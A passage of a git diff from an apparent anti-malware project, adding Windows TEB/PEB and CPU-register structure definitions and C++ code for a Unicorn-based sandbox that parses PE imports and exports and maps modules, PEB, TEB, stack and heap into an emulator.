glDispatchTable[233]; //0x7c4 + ULONG glReserved1[29]; //0xb68 + ULONG glReserved2; //0xbdc + ULONG glSectionInfo; //0xbe0 + ULONG glSection; //0xbe4 + ULONG glTable; //0xbe8 + ULONG glCurrentRC; //0xbec + ULONG glContext; //0xbf0 + ULONG LastStatusValue; //0xbf4 + struct _STRING32 StaticUnicodeString; //0xbf8 + WCHAR StaticUnicodeBuffer[261]; //0xc00 + ULONG DeallocationStack; //0xe0c + ULONG TlsSlots[64]; //0xe10 + struct LIST_ENTRY32 TlsLinks; //0xf10 + ULONG Vdm; //0xf18 + ULONG ReservedForNtRpc; //0xf1c + ULONG DbgSsReserved[2]; //0xf20 + ULONG HardErrorMode; //0xf28 + ULONG Instrumentation[9]; //0xf2c + struct _GUID ActivityId; //0xf50 + ULONG SubProcessTag; //0xf60 + ULONG PerflibData; //0xf64 + ULONG EtwTraceData; //0xf68 + ULONG WinSockData; //0xf6c + ULONG GdiBatchCount; //0xf70 + union + { + struct _PROCESSOR_NUMBER CurrentIdealProcessor; //0xf74 + ULONG IdealProcessorValue; //0xf74 + struct + { + UCHAR ReservedPad0; //0xf74 + UCHAR ReservedPad1; //0xf75 + UCHAR ReservedPad2; //0xf76 + UCHAR IdealProcessor; //0xf77 + }; + }; + ULONG GuaranteedStackBytes; //0xf78 + ULONG ReservedForPerf; //0xf7c + ULONG ReservedForOle; //0xf80 + ULONG WaitingOnLoaderLock; //0xf84 + ULONG SavedPriorityState; //0xf88 + ULONG ReservedForCodeCoverage; //0xf8c + ULONG ThreadPoolData; //0xf90 + ULONG TlsExpansionSlots; //0xf94 + ULONG MuiGeneration; //0xf98 + ULONG IsImpersonating; //0xf9c + ULONG NlsCache; //0xfa0 + ULONG pShimData; //0xfa4 + ULONG HeapData; //0xfa8 + ULONG CurrentTransactionHandle; //0xfac + ULONG ActiveFrame; //0xfb0 + ULONG FlsData; //0xfb4 + ULONG PreferredLanguages; //0xfb8 + ULONG UserPrefLanguages; //0xfbc + ULONG MergedPrefLanguages; //0xfc0 + ULONG MuiImpersonation; //0xfc4 + union + { + volatile USHORT CrossTebFlags; //0xfc8 + USHORT SpareCrossTebBits : 16; //0xfc8 + }; + union + { + USHORT SameTebFlags; //0xfca + struct + { + USHORT SafeThunkCall : 1; //0xfca + USHORT InDebugPrint : 1; //0xfca + USHORT HasFiberData : 1; //0xfca + USHORT SkipThreadAttach : 1; //0xfca + USHORT WerInShipAssertCode : 1; //0xfca + USHORT RanProcessInit : 1; //0xfca + USHORT ClonedThread : 1; //0xfca + USHORT SuppressDebugMsg : 1; //0xfca + USHORT DisableUserStackWalk : 1; //0xfca + USHORT RtlExceptionAttached : 1; //0xfca + USHORT InitialThread : 1; //0xfca + USHORT SessionAware : 1; //0xfca + USHORT LoadOwner : 1; //0xfca + USHORT LoaderWorker : 1; //0xfca + USHORT SkipLoaderInit : 1; //0xfca + USHORT SpareSameTebBits : 1; //0xfca + }; + }; + ULONG TxnScopeEnterCallback; //0xfcc + ULONG TxnScopeExitCallback; //0xfd0 + ULONG TxnScopeContext; //0xfd4 + ULONG LockCount; //0xfd8 + LONG WowTebOffset; //0xfdc + ULONG ResourceRetValue; //0xfe0 + ULONG ReservedForWdf; //0xfe4 + ULONGLONG ReservedForCrt; //0xfe8 + struct _GUID EffectiveContainerId; //0xff0 +}; +static_assert(sizeof(X32TEB) == 0x1000, "X32TEB Size check"); + +/* + x64的teb_64 32位的没做 +*/ +struct _ACTIVATION_CONTEXT_STACK { + struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* ActiveFrame; // 0x0 + struct _LIST_ENTRY FrameListCache; // 0x8 + ULONG Flags; // 0x18 + ULONG NextCookieSequenceNumber; // 0x1c + ULONG StackId; // 0x20 +}; +struct _GDI_TEB_BATCH { + ULONG Offset : 31; // 0x0 + ULONG HasRenderingCommand : 1; // 0x0 + ULONGLONG HDC; // 0x8 + ULONG Buffer[310]; // 0x10 +}; +struct _CLIENT_ID { + DWORD64 UniqueProcess; // 0x0 + DWORD64 UniqueThread; // 0x8 +}; +static_assert(sizeof(_CLIENT_ID) == 0x10, "_CLIENT_ID Size check"); + +static_assert(sizeof(_NT_TIB) == 0x38, "_NT_TIB Size check"); +typedef struct X64TEB { + struct _NT_TIB64 NtTib; // 0x0 + VOID* EnvironmentPointer; // 0x38 + struct _CLIENT_ID ClientId; // 0x40 + VOID* ActiveRpcHandle; // 0x50 + VOID* ThreadLocalStoragePointer; // 0x58 + struct X64PEB* ProcessEnvironmentBlock; // 0x60 + ULONG LastErrorValue; // 0x68 + ULONG CountOfOwnedCriticalSections; // 0x6c + VOID* CsrClientThread; // 0x70 + VOID* Win32ThreadInfo; // 0x78 + ULONG User32Reserved[26]; // 0x80 + ULONG UserReserved[5]; // 0xe8 + VOID* WOW32Reserved; // 0x100 + ULONG CurrentLocale; // 0x108 + ULONG FpSoftwareStatusRegister; // 0x10c + VOID* ReservedForDebuggerInstrumentation[16]; // 0x110 + VOID* SystemReserved1[30]; // 0x190 + CHAR PlaceholderCompatibilityMode; // 0x280 + UCHAR PlaceholderHydrationAlwaysExplicit; // 0x281 + CHAR PlaceholderReserved[10]; // 0x282 + ULONG ProxiedProcessId; // 0x28c + struct _ACTIVATION_CONTEXT_STACK _ActivationStack; // 0x290 + UCHAR WorkingOnBehalfTicket[8]; // 0x2b8 + LONG ExceptionCode; // 0x2c0 + UCHAR Padding0[4]; // 0x2c4 + struct _ACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; // 0x2c8 + ULONGLONG InstrumentationCallbackSp; // 0x2d0 + ULONGLONG InstrumentationCallbackPreviousPc; // 0x2d8 + ULONGLONG InstrumentationCallbackPreviousSp; // 0x2e0 + ULONG TxFsContext; // 0x2e8 + UCHAR InstrumentationCallbackDisabled; // 0x2ec + UCHAR UnalignedLoadStoreExceptions; // 0x2ed + UCHAR Padding1[2]; // 0x2ee + struct _GDI_TEB_BATCH GdiTebBatch; // 0x2f0 + struct _CLIENT_ID RealClientId; // 0x7d8 + VOID* GdiCachedProcessHandle; // 0x7e8 + ULONG GdiClientPID; // 0x7f0 + ULONG GdiClientTID; // 0x7f4 + VOID* GdiThreadLocalInfo; // 0x7f8 + ULONGLONG Win32ClientInfo[62]; // 0x800 + VOID* glDispatchTable[233]; // 0x9f0 + ULONGLONG glReserved1[29]; // 0x1138 + VOID* glReserved2; // 0x1220 + VOID* glSectionInfo; // 0x1228 + VOID* glSection; // 0x1230 + VOID* glTable; // 0x1238 + VOID* glCurrentRC; // 0x1240 + VOID* glContext; // 0x1248 + ULONG LastStatusValue; // 0x1250 + UCHAR Padding2[4]; // 0x1254 + struct _UNICODE_STRING StaticUnicodeString; // 0x1258 + WCHAR StaticUnicodeBuffer[261]; // 0x1268 + UCHAR Padding3[6]; // 0x1472 + VOID* DeallocationStack; // 0x1478 + VOID* TlsSlots[64]; // 0x1480 + struct _LIST_ENTRY TlsLinks; // 0x1680 + VOID* Vdm; // 0x1690 + VOID* ReservedForNtRpc; // 0x1698 + VOID* DbgSsReserved[2]; // 0x16a0 + ULONG HardErrorMode; // 0x16b0 + UCHAR Padding4[4]; // 0x16b4 + VOID* Instrumentation[11]; // 0x16b8 + struct _GUID ActivityId; // 0x1710 + VOID* SubProcessTag; // 0x1720 + VOID* PerflibData; // 0x1728 + VOID* EtwTraceData; // 0x1730 + VOID* WinSockData; // 0x1738 + ULONG GdiBatchCount; // 0x1740 + union { + struct _PROCESSOR_NUMBER CurrentIdealProcessor; // 0x1744 + ULONG IdealProcessorValue; // 0x1744 + struct { + UCHAR ReservedPad0; // 0x1744 + UCHAR ReservedPad1; // 0x1745 + UCHAR ReservedPad2; // 0x1746 + UCHAR IdealProcessor; // 0x1747 + }; + }; + ULONG GuaranteedStackBytes; // 0x1748 + UCHAR Padding5[4]; // 0x174c + VOID* ReservedForPerf; // 0x1750 + VOID* ReservedForOle; // 0x1758 + ULONG WaitingOnLoaderLock; // 0x1760 + UCHAR Padding6[4]; // 0x1764 + VOID* SavedPriorityState; // 0x1768 + ULONGLONG ReservedForCodeCoverage; // 0x1770 + VOID* ThreadPoolData; // 0x1778 + VOID** TlsExpansionSlots; // 0x1780 + VOID* DeallocationBStore; // 0x1788 + VOID* BStoreLimit; // 0x1790 + ULONG MuiGeneration; // 0x1798 + ULONG IsImpersonating; // 0x179c + VOID* NlsCache; // 0x17a0 + VOID* pShimData; // 0x17a8 + ULONG HeapData; // 0x17b0 + UCHAR Padding7[4]; // 0x17b4 + VOID* CurrentTransactionHandle; // 0x17b8 + struct _TEB_ACTIVE_FRAME* ActiveFrame; // 0x17c0 + VOID* FlsData; // 0x17c8 + VOID* PreferredLanguages; // 0x17d0 + VOID* UserPrefLanguages; // 0x17d8 + VOID* MergedPrefLanguages; // 0x17e0 + ULONG MuiImpersonation; // 0x17e8 + union { + volatile USHORT CrossTebFlags; // 0x17ec + USHORT SpareCrossTebBits : 16; // 0x17ec + }; + union { + USHORT SameTebFlags; // 0x17ee + struct { + USHORT SafeThunkCall : 1; // 0x17ee + USHORT InDebugPrint : 1; // 0x17ee + USHORT HasFiberData : 1; // 0x17ee + USHORT SkipThreadAttach : 1; // 0x17ee + USHORT WerInShipAssertCode : 1; // 0x17ee + USHORT RanProcessInit : 1; // 0x17ee + USHORT ClonedThread : 1; // 0x17ee + USHORT SuppressDebugMsg : 1; // 0x17ee + USHORT DisableUserStackWalk : 1; // 0x17ee + USHORT RtlExceptionAttached : 1; // 0x17ee + USHORT InitialThread : 1; // 0x17ee + USHORT SessionAware : 1; // 0x17ee + USHORT LoadOwner : 1; // 0x17ee + USHORT LoaderWorker : 1; // 0x17ee + USHORT SkipLoaderInit : 1; // 0x17ee + USHORT SpareSameTebBits : 1; // 0x17ee + }; + }; + VOID* TxnScopeEnterCallback; // 0x17f0 + VOID* TxnScopeExitCallback; // 0x17f8 + VOID* TxnScopeContext; // 0x1800 + ULONG LockCount; // 0x1808 + LONG WowTebOffset; // 0x180c + VOID* ResourceRetValue; // 0x1810 + VOID* ReservedForWdf; // 0x1818 + ULONGLONG ReservedForCrt; // 0x1820 + struct _GUID EffectiveContainerId; // 0x1828 +}; +static_assert(sizeof(X64TEB) == 0x1838, "TEB Size check"); +struct struct_gs_base { + char unk[0x30]; // 0x0 + uint64_t teb; // 0x30 + char unk2[0x28]; // 0x38 + uint64_t peb; // 0x60 +}; +/// See: Segment Descriptor +union SegmentDescriptor { + ULONG64 all; + struct { + ULONG64 limit_low : 16; + ULONG64 base_low : 16; + ULONG64 base_mid : 8; + ULONG64 type : 4; + ULONG64 system : 1; + ULONG64 dpl : 2; + ULONG64 present : 1; + ULONG64 limit_high : 4; + ULONG64 avl : 1; + ULONG64 l : 1; //!< 64-bit code segment (IA-32e mode only) + ULONG64 db : 1; + ULONG64 gran : 1; + ULONG64 base_high : 8; + } fields; +}; +/// @copydoc SegmentDescriptor +struct SegmentDesctiptorX64 { + SegmentDescriptor descriptor; + ULONG32 base_upper32; + ULONG32 reserved; +}; +// 每个系统的KPCR结构都不一样,懒了 +typedef struct _KPCR { + SegmentDesctiptorX64 gdt[8]; +} KPCR; + +#include +struct Idtr { + unsigned short limit; + ULONG_PTR base; +}; + +struct Idtr32 { + unsigned short limit; + ULONG32 base; +}; +static_assert(sizeof(Idtr32) == 6, "Size check"); +using Gdtr = Idtr; +#if defined(_AMD64_) +static_assert(sizeof(Idtr) == 10, "Size check"); +static_assert(sizeof(Gdtr) == 10, "Size check"); +#else +static_assert(sizeof(Idtr) == 6, "Size check"); +static_assert(sizeof(Gdtr) == 6, "Size check"); +#endif + +#include +union SegmentSelector { + unsigned short all; + struct { + unsigned short rpl : 2; //!< Requested Privilege Level + unsigned short ti : 1; //!< Table Indicator + unsigned short index : 13; + } fields; +}; +static_assert(sizeof(SegmentSelector) == 2, "Size check"); +#include + +union FlagRegister { + ULONG_PTR all; + struct { + ULONG_PTR cf : 1; //!< [0] Carry flag + ULONG_PTR reserved1 : 1; //!< [1] Always 1 + ULONG_PTR pf : 1; //!< [2] Parity flag + ULONG_PTR reserved2 : 1; //!< [3] Always 0 + ULONG_PTR af : 1; //!< [4] Borrow flag + ULONG_PTR reserved3 : 1; //!< [5] Always 0 + ULONG_PTR zf : 1; //!< [6] Zero flag + ULONG_PTR sf : 1; //!< [7] Sign flag + ULONG_PTR tf : 1; //!< [8] Trap flag + ULONG_PTR intf : 1; //!< [9] Interrupt flag + ULONG_PTR df : 1; //!< [10] Direction flag + ULONG_PTR of : 1; //!< [11] Overflow flag + ULONG_PTR iopl : 2; //!< [12:13] I/O privilege level + ULONG_PTR nt : 1; //!< [14] Nested task flag + ULONG_PTR reserved4 : 1; //!< [15] Always 0 + ULONG_PTR rf : 1; //!< [16] Resume flag + ULONG_PTR vm : 1; //!< [17] Virtual 8086 mode + ULONG_PTR ac : 1; //!< [18] Alignment check + ULONG_PTR vif : 1; //!< [19] Virtual interrupt flag + ULONG_PTR vip : 1; //!< [20] Virtual interrupt pending + ULONG_PTR id : 1; //!< [21] Identification flag + ULONG_PTR reserved5 : 10; //!< [22:31] Always 0 + } fields; +}; +struct moudle_export { + char name[MAX_PATH]; + uint64_t function_address; + void* function_callback; +}; +struct moudle_import { + char name[MAX_PATH]; + char dll_name[MAX_PATH]; + uint64_t function_address; + void* function_callback; + bool is_delayed_import; +}; +struct moudle_section { + char name[9]; + ULONG base; + ULONG size; + ULONG protect_flag; +}; +struct struct_handle_table { + uint64_t handle; // 值 + uint64_t type; // 对象类型 + uint64_t address; // 地址 + uint64_t authorization; // 权限 + uint64_t protect_flag; // 是否被保护 + char name[MAX_PATH]; // 名称 +}; +struct struct_moudle { + char name[MAX_PATH]; + uint64_t entry; + uint64_t base; + uint64_t size; + std::vector> import_function; + std::vector> export_function; + std::vector> sections; +}; +struct struct_process { + char ImageFileName[MAX_PATH]; // 名字 + struct_handle_table HandleTable; // 句柄表 + uint64_t DebugPort; // 一直为0谢谢 + uint64_t UniqueProcessId; // 进程id + uint64_t InheritedFromUniqueProcessId; // 父进程ID + X64PEB PebBaseAddress; // PEB 里面有ldr + uint64_t ExitStatus; // 终止状态 + uint64_t AffinityMask; // 关联掩码 + uint64_t BasePriority; // 优先级类 + uint64_t VadRoot; // VAD + std::vector moudle_list; // 模块列表 +}; + +typedef struct AllocBlock_s { + AllocBlock_s(ULONG64 b, ULONG s) : base(b), size(s) { free = false; } + ULONG64 base; + ULONG size; + bool free; +} AllocBlock_t; + +struct struct_params { + int type; // 类型 + char str[MAX_PATH]; // PARAMS_CHAR + wchar_t wstr[MAX_PATH]; // PARAMS_WCHAR + uint64_t uint; // PARAMS_UINT + int _int; // PARAMS_INT +}; +struct struct_process_trace_log { + time_t time; // 时间 + char function_name[MAX_PATH]; // 名字 + char moudle_name[MAX_PATH]; // 模块名字 + uint64_t function_address; // 地址 + uint64_t call_address; + int params_num; // 参数数量 + std::vector save_regs; // 各个寄存器状态 + std::vector save_params; // 各个参数值 +}; diff --git a/ai_anti_malware/sandbox.cpp b/ai_anti_malware/sandbox.cpp new file mode 100644 index 0000000..3bba904 --- /dev/null +++ b/ai_anti_malware/sandbox.cpp @@ -0,0 +1,575 @@ +#include "sandbox.h" +#include "sandbox_callbacks.h" +std::string getDllNameFromApiSetMap(const std::string& apiSet) { + const std::wstring wApiSet(apiSet.begin(), apiSet.end()); + + // 获取系统版本信息 + using RtlGetVersionFunc = LONG(__stdcall*)(PRTL_OSVERSIONINFOW); + const auto pRtlGetVersion = reinterpret_cast( + GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetVersion")); + + RTL_OSVERSIONINFOEXW verInfo{}; + verInfo.dwOSVersionInfoSize = sizeof(verInfo); + pRtlGetVersion(reinterpret_cast(&verInfo)); + + const ULONG verShort = (verInfo.dwMajorVersion << 8) | + (verInfo.dwMinorVersion << 4) | + verInfo.wServicePackMajor; + + if (verShort >= static_cast(WinVer::kWin10)) { + const auto apiSetMap = reinterpret_cast( + reinterpret_cast(__readgsqword(0x60))->ApiSetMap); + const auto apiSetMapAsNumber = reinterpret_cast(apiSetMap); + auto nsEntry = reinterpret_cast( + apiSetMap->Start + apiSetMapAsNumber); + + // 遍历API集合查找匹配项 + for (ULONG i = 0; i < apiSetMap->Count; i++) { + UNICODE_STRING nameString{}, valueString{}; + nameString.MaximumLength = static_cast(nsEntry->NameLength); + nameString.Length = static_cast(nsEntry->NameLength); + nameString.Buffer = reinterpret_cast(apiSetMapAsNumber + + nsEntry->NameOffset); + + const std::wstring name(nameString.Buffer, + nameString.Length / sizeof(WCHAR)); + const std::wstring fullName = name + L".dll"; + + if (_wcsicmp(wApiSet.c_str(), fullName.c_str()) == 0) { + if (nsEntry->ValueCount == 0) { + return ""; + } + + const auto valueEntry = + reinterpret_cast( + apiSetMapAsNumber + nsEntry->ValueOffset); + valueString.Buffer = reinterpret_cast( + apiSetMapAsNumber + valueEntry->ValueOffset); + valueString.MaximumLength = + static_cast(valueEntry->ValueLength); + valueString.Length = + static_cast(valueEntry->ValueLength); + + const std::wstring value(valueString.Buffer, + valueString.Length / sizeof(WCHAR)); + return {value.begin(), value.end()}; + } + ++nsEntry; + } + } else { + // 不支持Windows 10以下版本 + throw std::runtime_error("Unsupported Windows version"); + } + return ""; +} + +class ImportResolver : public peconv::t_function_resolver { + public: + explicit ImportResolver(std::map context) + : _functionMap(std::move(context)) {} + + FARPROC resolve_func(LPSTR libName, LPSTR funcName) override { + return reinterpret_cast(_functionMap[std::string(funcName)]); + } + + private: + std::map _functionMap; +}; + +class cListImportNames : public peconv::ImportThunksCallback { + public: + cListImportNames(BYTE* _modulePtr, size_t _moduleSize, + std::vector>& name_to_addr) + : ImportThunksCallback(_modulePtr, _moduleSize), + nameToAddr(name_to_addr) {} + + virtual bool processThunks(LPSTR lib_name, ULONG_PTR origFirstThunkPtr, + ULONG_PTR firstThunkPtr) { + if (this->is64b) { + IMAGE_THUNK_DATA64* desc = + reinterpret_cast(origFirstThunkPtr); + ULONGLONG* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl( + lib_name, desc, call_via, IMAGE_ORDINAL_FLAG64); + } + IMAGE_THUNK_DATA32* desc = + reinterpret_cast(origFirstThunkPtr); + DWORD* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl( + lib_name, desc, call_via, IMAGE_ORDINAL_FLAG32); + } + + protected: + template + bool processThunks_tpl(LPSTR lib_name, T_IMAGE_THUNK_DATA* desc, + T_FIELD* call_via, T_FIELD ordinal_flag) { + DWORD call_via_rva = static_cast((ULONG_PTR)call_via - + (ULONG_PTR)this->modulePtr); + LPSTR func_name = NULL; + if ((desc->u1.Ordinal & ordinal_flag) == 0) { + PIMAGE_IMPORT_BY_NAME by_name = + (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + + desc->u1.AddressOfData); + func_name = reinterpret_cast(by_name->Name); + std::string fuck_up_api_ms = lib_name; + if (fuck_up_api_ms.find("api-ms-") != std::string::npos) { + fuck_up_api_ms = getDllNameFromApiSetMap(fuck_up_api_ms); + if (fuck_up_api_ms.size() <= 1) __debugbreak(); + } + auto import_data = std::make_shared(); + memcpy(import_data->name, func_name, strlen(func_name)); + memcpy(import_data->dll_name, fuck_up_api_ms.c_str(), + fuck_up_api_ms.size()); + import_data->function_address = call_via_rva; + import_data->is_delayed_import = false; + nameToAddr.push_back(import_data); + } + return true; + } + + std::vector>& nameToAddr; +}; + +Sandbox::Sandbox() {} + +Sandbox::~Sandbox() {} + +auto Sandbox::PushModuleToVM(const char* dllName, uint64_t moduleBase, + uint32_t x32Base) -> void { + // 检查模块是否已加载 + auto isModuleLoaded = + std::any_of(m_moduleList.begin(), m_moduleList.end(), + [moduleBase](std::shared_ptr module) { + return module->base == moduleBase; + }); + + if (isModuleLoaded) { + std::cout << "[PE] Skipping " << dllName << " (already loaded)\n"; + return; + } + + // 解析PE头 + auto* dosHeader = reinterpret_cast(moduleBase); + auto* ntHeaders = reinterpret_cast( + reinterpret_cast(moduleBase) + dosHeader->e_lfanew); + + // 获取区段对齐值 + DWORD sectionAlignment = + (ntHeaders->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) + ? reinterpret_cast(ntHeaders) + ->OptionalHeader.SectionAlignment + : ntHeaders->OptionalHeader.SectionAlignment; + + // 获取区段头 + auto* sectionHeader = reinterpret_cast( + reinterpret_cast(ntHeaders) + sizeof(ntHeaders->Signature) + + sizeof(ntHeaders->FileHeader) + + ntHeaders->FileHeader.SizeOfOptionalHeader); + + // 创建新模块 + struct_moudle newModule{}; + strncpy(newModule.name, dllName, strlen(dllName)); + newModule.base = this->m_peInfo->isX64 ? moduleBase : x32Base; + newModule.entry = ntHeaders->OptionalHeader.AddressOfEntryPoint; + newModule.size = ntHeaders->OptionalHeader.SizeOfImage; + + // 处理区段 + for (WORD i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++) { + const auto& section = sectionHeader[i]; + + // if (!(section.Characteristics & + // (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE))) { + // continue; + // } + + // 设置区段保护属性 + int protection = UC_PROT_READ; + if (section.Characteristics & IMAGE_SCN_MEM_EXECUTE) + protection |= UC_PROT_EXEC; + if (section.Characteristics & IMAGE_SCN_MEM_WRITE) + protection |= UC_PROT_WRITE; + + // 计算区段大小 + auto sectionSize = + AlignSize(max(section.Misc.VirtualSize, section.SizeOfRawData), + sectionAlignment); + + // 创建区段信息 + moudle_section newSection{}; + strncpy(newSection.name, reinterpret_cast(section.Name), + 8); + newSection.base = section.VirtualAddress; + newSection.size = sectionSize; + newSection.protect_flag = protection; + + newModule.sections.push_back( + std::make_shared(newSection)); + std::cout << "[PE] " << dllName << " Section found: " << newSection.name + << '\n'; + } + m_moduleList.push_back(std::make_shared(newModule)); + uc_mem_map(m_ucEngine, moduleBase, newModule.size, + UC_PROT_READ | UC_PROT_EXEC); + uc_mem_write(m_ucEngine, moduleBase, (void*)moduleBase, newModule.size); +} + +auto Sandbox::ResolveExport() -> void { + DWORD exportSize = 0; + static RtlImageDirectoryEntryToDataFn fnRtlImageDirectoryEntryToData; + if (fnRtlImageDirectoryEntryToData == nullptr) { + fnRtlImageDirectoryEntryToData = + reinterpret_cast(GetProcAddress( + GetModuleHandleA("ntdll.dll"), "RtlImageDirectoryEntryToData")); + } + // 获取导出表 + PIMAGE_EXPORT_DIRECTORY exportDirectory = + static_cast(fnRtlImageDirectoryEntryToData( + m_peInfo->peBuffer, TRUE, IMAGE_DIRECTORY_ENTRY_EXPORT, + &exportSize)); + + if (exportDirectory) { + const DWORD numberOfNames = exportDirectory->NumberOfNames; + PDWORD addressOfFunctions = + reinterpret_cast(static_cast(m_peInfo->peBuffer) + + exportDirectory->AddressOfFunctions); + PDWORD addressOfNames = + reinterpret_cast(static_cast(m_peInfo->peBuffer) + + exportDirectory->AddressOfNames); + PWORD addressOfNameOrdinals = + reinterpret_cast(static_cast(m_peInfo->peBuffer) + + exportDirectory->AddressOfNameOrdinals); + + // 遍历导出函数 + for (size_t i = 0; i < numberOfNames; i++) { + PCHAR functionName = reinterpret_cast( + static_cast(m_peInfo->peBuffer) + addressOfNames[i]); + + // 获取函数RVA + const DWORD functionRva = + addressOfFunctions[addressOfNameOrdinals[i]]; + + // 创建导出数据结构 + moudle_export exportData{}; + memcpy(exportData.name, functionName, strlen(functionName)); + exportData.function_address = functionRva; + + m_exportFuncDict.push_back( + std::make_shared(exportData)); + } + } +} + +auto Sandbox::processImportModule(const moudle_import* importModule) -> void { + // 构建模块路径 + const std::string systemDir = + m_peInfo->isX64 ? "\\System32\\" : "\\SysWOW64\\"; + char windowsPath[MAX_PATH]; + if (!GetWindowsDirectoryA(windowsPath, sizeof(windowsPath))) { + throw std::runtime_error("Failed to get Windows directory"); + } + + const std::string modulePath = + std::string(windowsPath) + systemDir + importModule->dll_name; + + // 加载PE模块 + size_t mappedPeSize = 0; + const auto moduleBase = reinterpret_cast( + peconv::load_pe_module(modulePath.c_str(), mappedPeSize, false, false)); + + if (!moduleBase) { + return; + } + + // 添加到虚拟机 + const auto moduleBase32 = static_cast(moduleBase); + PushModuleToVM(importModule->dll_name, moduleBase, moduleBase32); +} +auto Sandbox::ResoveImport() -> void { + // 处理延迟导入 + peconv::load_delayed_imports(static_cast(m_peInfo->peBuffer), 0); + + // 解析导入表 + cListImportNames importCallback(static_cast(m_peInfo->peBuffer), + m_peInfo->peSize, m_impFuncDict); + + if (!peconv::process_import_table(static_cast(m_peInfo->peBuffer), + m_peInfo->peSize, &importCallback)) { + throw std::runtime_error("Failed to process import table"); + } + + // 处理每个导入模块 + for (const auto& importModule : m_impFuncDict) { + processImportModule(importModule.get()); + } +} +auto Sandbox::SetupVirtualMachine() -> void { + SegmentSelector cs = {0}; + cs.fields.index = 1; + uc_reg_write(m_ucEngine, UC_X86_REG_CS, &cs.all); + + SegmentSelector ds = {0}; + ds.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_DS, &ds.all); + + SegmentSelector ss = {0}; + ss.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_SS, &ss.all); + + SegmentSelector es = {0}; + es.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_ES, &es.all); + + SegmentSelector gs = {0}; + gs.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_GS, &gs.all); + + FlagRegister eflags = {0}; + eflags.fields.id = 1; + eflags.fields.intf = 1; + eflags.fields.reserved1 = 1; + + uc_reg_write(m_ucEngine, UC_X86_REG_EFLAGS, &eflags.all); + + uint64_t cr8 = 0; + uc_reg_write(m_ucEngine, UC_X86_REG_CR8, &cr8); + + /* + 映射 m_KSharedUserDataBase + */ + uint64_t m_KSharedUserDataBase = 0x7FFE0000; + uint64_t m_KSharedUserDataEnd = 0x7FFE0FFF; // 0x7FFE2000 + uint64_t m_KSharedUserDataSize = + AlignSize(m_KSharedUserDataEnd - m_KSharedUserDataBase, PAGE_SIZE); + + uc_mem_map(m_ucEngine, m_KSharedUserDataBase, m_KSharedUserDataSize, + UC_PROT_READ); + uc_mem_write(m_ucEngine, m_KSharedUserDataBase, + (void*)m_KSharedUserDataBase, m_KSharedUserDataSize); + + m_tebBase = TEB_BASE; // 进程TEB地址 + m_pebBase = PEB_BASE; // 进程PEB地址 + // stack + m_stackBase = this->m_peInfo->isX64 ? STACK_BASE_64 : STACK_BASE_32; + m_stackSize = this->m_peInfo->isX64 ? STACK_SIZE_64 : STACK_SIZE_32; + m_stackEnd = m_stackBase + m_stackSize; + + // heap + m_heapBase = this->m_peInfo->isX64 ? HEAP_ADDRESS_64 : HEAP_ADDRESS_32; + m_heapSize = this->m_peInfo->isX64 ? HEAP_SIZE_64 : HEAP_SIZE_32; + m_heapEnd = m_heapBase + m_heapSize; + + // 根据PE文件类型设置PEB和TEB + if (this->m_peInfo->isX64) { + // 设置64位PEB + m_peb64.ImageBaseAddress = m_peInfo->RecImageBase; + m_pebEnd = m_pebBase + AlignSize(sizeof(X64PEB), PAGE_SIZE); + m_tebEnd = m_tebBase + AlignSize(sizeof(X64TEB), PAGE_SIZE); + + // 设置64位TEB + m_teb64.ClientId.UniqueProcess = GetCurrentProcessId(); + m_teb64.ClientId.UniqueThread = GetCurrentThreadId(); + m_teb64.ProcessEnvironmentBlock = reinterpret_cast(m_pebBase); + m_teb64.NtTib.StackBase = (DWORD64)m_stackBase; + m_teb64.NtTib.StackLimit = (DWORD64)m_stackSize; + + // 设置堆 + m_peb64.ProcessHeap = m_heapBase; + + // 设置GS基址结构 + m_gsBaseStruct.teb = m_tebBase; + m_gsBaseStruct.peb = m_pebBase; + uint64_t gsAllocSize = AlignSize(sizeof(struct_gs_base), PAGE_SIZE); + + // 映射PEB到虚拟内存 + uc_mem_map(m_ucEngine, m_pebBase, m_pebEnd - m_pebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_pebBase, &m_peb64, sizeof(X64PEB)); + + // 映射TEB到虚拟内存 + uc_mem_map(m_ucEngine, m_tebBase, m_tebEnd - m_tebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_tebBase, &m_teb64, sizeof(X64TEB)); + + // 映射GS基址结构到虚拟内存 + uc_mem_map(m_ucEngine, m_gsBase, gsAllocSize, UC_PROT_READ); + uc_mem_write(m_ucEngine, m_gsBase, &m_gsBaseStruct, + sizeof(struct_gs_base)); + + // 设置GS基址MSR + uc_x86_msr msr; + msr.rid = static_cast(Msr::kIa32GsBase); + msr.value = m_gsBase; + uc_reg_write(m_ucEngine, UC_X86_REG_MSR, &msr); + } else { + // 设置32位PEB + m_peb32.ImageBaseAddress = static_cast(m_peInfo->RecImageBase); + m_pebEnd = m_pebBase + AlignSize(sizeof(X32PEB), PAGE_SIZE); + m_tebEnd = m_tebBase + AlignSize(sizeof(X32TEB), PAGE_SIZE); + + // 设置32位TEB + m_teb32.ClientId.UniqueProcess = GetCurrentProcessId(); + m_teb32.ClientId.UniqueThread = GetCurrentThreadId(); + m_teb32.ProcessEnvironmentBlock = static_cast(m_pebBase); + m_teb32.NtTib.StackBase = static_cast(m_stackBase); + m_teb32.NtTib.StackLimit = static_cast(m_stackSize); + + // 设置堆 + m_peb32.ProcessHeap = static_cast(m_heapBase); + + // 映射PEB到虚拟内存 + uc_mem_map(m_ucEngine, m_pebBase, m_pebEnd - m_pebBase, + UC_PROT_READ | UC_PROT_WRITE); + uc_mem_write(m_ucEngine, m_pebBase, &m_peb32, sizeof(X32PEB)); + + // 映射TEB到虚拟内存 + uc_mem_map(m_ucEngine, m_tebBase, m_tebEnd - m_tebBase, + UC_PROT_READ | UC_PROT_WRITE); + 